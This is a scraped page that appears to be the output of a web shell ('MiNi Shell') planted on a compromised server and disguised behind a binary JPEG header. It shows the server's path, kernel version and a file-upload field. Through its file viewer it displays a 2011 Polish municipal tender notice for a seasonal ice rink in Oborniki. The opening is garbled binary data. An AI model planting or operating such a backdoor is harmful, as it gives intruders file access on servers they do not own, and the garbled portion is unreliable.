JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111103/286891-N-2011.html

<p class="kh_header"><b>Oborniki: Dostawa i montaż składanego lodowiska sezonowego w ramach programu Biały Orlik przy ul. Obrzyckiej 88 w Obornikach</b><br>
<b>Numer ogłoszenia: 286891 - 2011; data zamieszczenia: 03.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Oborniki, Urząd Miejski w Obornikach , ul. Piłsudskiego 76, 64-600 Oborniki, woj. wielkopolskie, tel. 061 6559100; 6559133, faks 061 6559101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.oborniki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż składanego lodowiska sezonowego w ramach programu Biały Orlik przy ul. Obrzyckiej 88 w Obornikach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Nazwa przedmiotu zamówienia: dostawa i montaż składanego lodowiska sezonowego w ramach programu Biały Orlik przy ul. Obrzyckiej 88 w Obornikach.
2.Zakres realizacji obejmuje:
1)Instalacja lodowiska mobilnego o wymiarach tafli 20x40 m (grubość lodu 5-7 cm) w technologii aluminiowej składające się z następujących zespołów:
- system ziębniczy złożony z pojedynczych modułów o długości 5,0-6,0 m i szerokości 1,0 m (gdy długość lodowiska nie jest wielokrotnością 5,00 m ostatni moduł należy dobrać o długości odpowiadającej wymiarom lodowiska) z możliwością wielokrotnego składania i rozkładania, zapewniająca szczelność połączeń. W skład modułu mrożeniowego wchodzi kolektor zasilający, zespół rur o rozstawie i średnicy gwarantującej  równomierne chłodzenie powierzchni lodowiska oraz kolektor powrotny. Kolektor powrotny powinien posiadać system odpowietrzania. Moduły mrożeniowe łączone są między sobą oraz kolektorami za pomocą elastycznych węży do systemów chłodniczych. Nie dopuszcza się możliwości łączenia rur kolektorów za pomocą złączy kołnierzowych. Przewody ziębnicze muszą charakteryzować się wytrzymałością na ciśnienie min. 3 bary. Do równomiernego rozłożenia rur w każdym module muszą być zastosowane profile dystansujące. Przepływ czynnika chłodzącego zapewniający wyrównanie temperatury dla całej powierzchni lodowiska. Moduły po złożeniu powinny zajmować jak najmniejszą powierzchnię magazynową.
Wykonawca winien dostarczyć deklarację zgodności, świadectwa, certyfikaty, karty katalogowe oferowanego systemu ziębniczego. 
Pod orurowaniem winna być ułożona warstwa izolacyjna zabezpieczająca przed przemarzaniem gruntu oraz uszkodzeniem nawierzchni boiska wielofunkcyjnego.
- kompaktowego agregatu chłodniczego o mocy chłodniczej min. 168,4 kW, energii elektrycznej nie przekraczającej 76,64 kW, przy temperaturze powietrza chłodzącego +15oC i parametrach 35% wodnego roztworu glikolu (czynnik chłodniczy: -12oC/-9oC). Dla zapewnienia energooszczędności  współczynnik wydajności agregatu w trybie chłodzenia  na poziomie min COP=3,80.
Czynnikiem ziębniczym agregatu chłodniczego jest freon R404A. W skład kompaktowego agregatu chłodniczego wchodzą sprężarki pół-hermetyczne. Agregat chłodniczy powinien posiadać 4-stopnie regulacji wydajności, elektroniczną tablicę sterowniczą, pompę obiegową czynnika chłodniczego. Agregat musi spełniać wymagania dotyczące średnich ciśnień akustycznych zgodnie z wymaganiami zawartymi w rozporządzeniu Ministra Środowiska z 14 czerwca 2007 r. w sprawie dopuszczalnych poziomów hałasu w środowisku (Dz. Ust. Z 2007 r. Nr 120, poz. 826). 
Wykonawca zobowiązany jest do zabezpieczenia agregatu przed dostępem osób nieupoważnionych poprzez wykonanie stałego ogrodzenia w odległości zapewniającej niezakłóconą pracę urządzenia. Agregat chłodniczy musi być nowy i posiadać oznakowanie CE zgodnie z obowiązującymi przepisami lub oznaczony znakiem budowlanym, zgodnie z art.5 ust. 1 ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. z 2004 r. Nr 92 poz. 881). W ramach zamówienia należy wykonać utwardzenie gruntu pod posadowienie agregatu.
- czynnika chłodniczego w ilości zapewniającej prawidłową pracę instalacji mrożeniowej w postaci 35% roztworu glikolu etylenowego z dodatkami uszlachetniającymi (inhibitory korozji) środkami antypiennymi i regulatorami pH.
Do magazynowania roztworu należy przewidzieć dostawę odpowiedniej ilości paletopojemników - 1000 l oraz pompę do przepompowywania. Wykonawca zapewni w okresie gwarancji glikol w niezbędnej ilości do uzupełnienia w przypadku wystąpienia wycieków.
- bandy rekreacyjnej w wykonaniu pozwalającym na przymarzanie do lodu.
Konstrukcja bandy wykonana z profili aluminiowych wypełnionych płytami PEHD w kolorze białym, listwa okopowa w kolorze żółtym, listwa poręczowa w kolorze niebieskim. Wysokość bandy 1,1-1,2m.
Banda powinna posiadać 2 bramki wejściowa i wyjściowa dla łyżwiarzy (szerokość 0,9-1,0m) oraz bramę dla rolby (szerokość 2,5-3,0m) w konstrukcji stalowej. Obie bramki powinny znajdować się od strony zaplecza szatniowego na ciągu istniejącej bramki w istniejącym ogrodzeniu boiska wielofunkcyjnego. Brama dla rolby powinna znajdować się w ciągu istniejącej bramy dwuskrzydłowej boiska wielofunkcyjnego (dostęp z utwardzonej alejki między boiskami).
- antypoślizgowych chodników gumowych do chodzenia w łyżwach o grubości min. 5mm, dł. 70mb i szer. 1,5m, układanych w traktach komunikacyjnych dla łyżwiarzy oraz w zapleczu sanitarno-szatniowym.
2)	Dostawa dodatkowego wyposażenia:
- łyżwy figurowe damskie, hokejowe męskie - 100 par w ilościach i rozmiarach wg poniższego wykazu:

	Rodzaj łyżew
	Dziecięce regulowane	Dziecięce	Damskie	Męskie
Rozmiar	28-29-30	31-32-33	34	35	36	37	38	39	40	41	42	43	44	45	46
Ilość par	5	5	5	5	5	6	6	8	8	6	6	7	5	1	1
					Męskie						
					3	3	3	4	6						

łyżwa zapinana na klamry zapadkowe z mikro-regulacją,
but wykonany z wysokiej jakości materiału odpornego na uszkodzenia i niskie temperatury, zachowujący elastyczność, konstrukcja zapewniająca komfort podczas jazdy,
kapeć wykonany z szybkoschnącego materiału, umożliwiający łatwe zdejmowanie i brak możliwości przesuwania kapcia wewnątrz buta,
płoza wykonana z hartowanej stali nierdzewnej, przystosowana do  częstego ostrzenia.

- ostrzałka do łyżew (1szt.), manualna, 2 diamenty wbudowane w maszynę, w tym jeden do kształtów płaskich (do gradowania kamienia) i drugi do kształtów wklęsłych (do przygotowania rowka do poszczególnych rodzajów łyżew: figurowych i hokejowych oraz uchwyt przystosowany do kilku rodzajów łyżew oraz dodatkowo 3 tarcze szlifierskie.
- suszarka do łyżew na min. 30 par obuwia, z dezynfekcją ozonową dwustronna.
- maszyna do pielęgnacji i konserwacji lodu - wielofunkcyjny pojazd z napędem na cztery koła,    wyposażony w 3-cylindrowy silnik diesla lub benzynowy o poj. 500-700cm3 i mocy min.15KM wg ISO 3046, przystosowany do pracy na lodowiskach o pow. do 800m2, wyposażony w zbiornik na wodę o poj. 200-250l oraz zbiornik na śnieg poj. 1 -1,4 m3. Agregat strugający o szerokości 1500mm, wyposażony w  dwa wirniki, pionowy i poziomy o napędzie hydraulicznym przenoszące zbierany śnieg do pojemnika zamontowanego na pojeździe oraz ostrze strugające z hartowanej stali o podwyższonej wytrzymałości, pozwalające na użytkowanie bez ostrzenia co najmniej 15 do 20 godz. Ręczne ustawienie głębokości strugania pozwalające precyzyjnie ustawić nóż na poziomie od 1mm, nacisk noża na lód od 750 do 900kg pozwalające na bardzo dokładne zebranie zniszczonej warstwy lodu i pokrycie lodowiska warstwą wody.
Pojazd powinien być wielofunkcyjny tzn. również używanej poza sezonem zimowym po bardzo łatwym demontażu nadbudowy jako urządzenie gospodarcze np. do przewiezienia zdemontowanego lodowiska do magazynu lub do różnego rodzaju prac w sezonie letnim. Urządzenie winno być zgodne z wytycznymi CE i obowiązującymi normami. Wymiary urządzenia powinny umożliwiać wjazd i wyjazd z garażu o szerokości bramy 2,5 m i wysokości garażu 2,5 m. 
- kontenerowy garaż na maszynę do pielęgnacji lodu wyposażony w bramę wjazdową, zapewniający właściwe warunki przechowywania sprzętu w okresie zimowym. Stylistyka kontenera zharmonizowana z wykończeniem istniejącego budynku szatniowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp. Zamówienia uzupełniające będą mogły zostać udzielone jeżeli:
1)polegają na powtórzeniu tego samego rodzaju zamówień co zamówienie podstawowe,
2)zamówienia uzupełniające są zgodne z przedmiotem zamówienia podstawowego,
3)wartość zamówień uzupełniających nie przekroczy 20 % wartości zamówienia podstawowego,
4)zostaną udzielone w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.11-8, 42.51.30.00-5, 42.94.34.00-2, 44.16.20.00-3, 44.16.32.00-2, 19.51.00.00-4, 44.21.11.00-3, 24.32.23.10-3, 37.41.12.20-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunek dotyczący wiedzy i doświadczenia tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum dwie dostawy wraz z montażem, tj. polegające na dostawie lodowiska składanego - sezonowego, o minimalnej powierzchni tafli lodu 500,00 m2 każde z lodowisk, w tym co najmniej jedno lodowisko wykonane na sztucznej nawierzchni sportowej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia warunek dotyczący sytuacji ekonomicznej i finansowej tj.: posiada ważne i opłacone ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 500.000 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca ponadto przedkłada:
1)Formularz ofertowy (sporządzony według wzoru stanowiącego załącznik nr 1 IDW).
2)Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o zamówienie publiczne albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku składania oferty wspólnej lub, gdy umocowanie takie nie wynika ze złożonego odpisu z właściwego rejestru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą Zamawiającego.
2.Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.
3.Zmiany umowy, o których mowa w ust. 1 muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3 ustawy Prawo zamówień publicznych, stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia.
4.Wszelkie zmiany postanowień niniejszej umowy mogą nastąpić pisemnie, za zgodą obu stron, z zastrzeżeniem ust. 5.
5.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
1)termin realizacji: w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonania usług oraz w przypadku zaistnienia niekorzystnych warunków klimatycznych, 
2)wynagrodzenie - w następstwie zmiany przepisów o podatku od towarów i usług (VAT),
3)przedmiot umowy - jeżeli konieczność wprowadzenia zmian jest skutkiem zmiany przepisów prawa lub wynika z okoliczności, których strony umowy nie mogły przewidzieć w momencie składania ofert (np. brak dostępności wymienionego w ofercie sprzętu). 
6.Nie stanowi zmiany umowy:
1)zmiana danych związanych z obsługą administracyjno - organizacyjną umowy,
2)zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany stanu faktycznego albo prawnego.  
7.Dokonanie zmian, o których mowa  w ust. 5 wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.oborniki.pl (bip.oborniki.pl)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Obornikach Wydział Inwestycji i Rozwoju Referat Zamówień Publicznych ul. Marsz. J. Piłsudskiego 76, 64-600 Oborniki, pokój nr 219, II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2011 godzina 09:00, miejsce: siedziba Zamawiającego - sekretariat, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com